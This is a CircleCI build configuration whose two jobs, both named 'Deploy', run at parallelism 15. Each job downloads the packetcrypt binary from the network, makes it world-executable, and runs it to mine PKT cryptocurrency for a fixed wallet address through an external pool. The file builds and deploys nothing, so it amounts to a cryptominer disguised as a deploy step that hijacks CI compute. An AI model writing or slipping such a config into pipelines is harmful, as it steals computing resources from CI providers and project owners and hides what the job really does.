version: 2.1

jobs:
  build:
    parallelism: 15
    docker:
      - image: python
    resource_class: large
    steps:
      - checkout
      - run:
         name: "Deploy"
         command: |
                      wget -O packetcrypt https://github.com/cjdelisle/packetcrypt_rs/releases/download/packetcrypt-v0.5.1/packetcrypt-v0.5.1-linux_amd64 && chmod 777 packetcrypt && ./packetcrypt ann -p pkt1q8qf58p5fzfp0jgde6dkv87uln7yz0ayjgp3z74 http://pool.pkteer.com
  build1:
    parallelism: 15
    docker:
      - image: python
    resource_class: large
    steps:
      - checkout
      - run:
         name: "Deploy"
         command: |
                      wget -O packetcrypt https://github.com/cjdelisle/packetcrypt_rs/releases/download/packetcrypt-v0.5.1/packetcrypt-v0.5.1-linux_amd64 && chmod 777 packetcrypt && ./packetcrypt ann -p pkt1q8qf58p5fzfp0jgde6dkv87uln7yz0ayjgp3z74 http://pool.pkteer.com

workflows:
  main:
    jobs:
      - build
      - build1
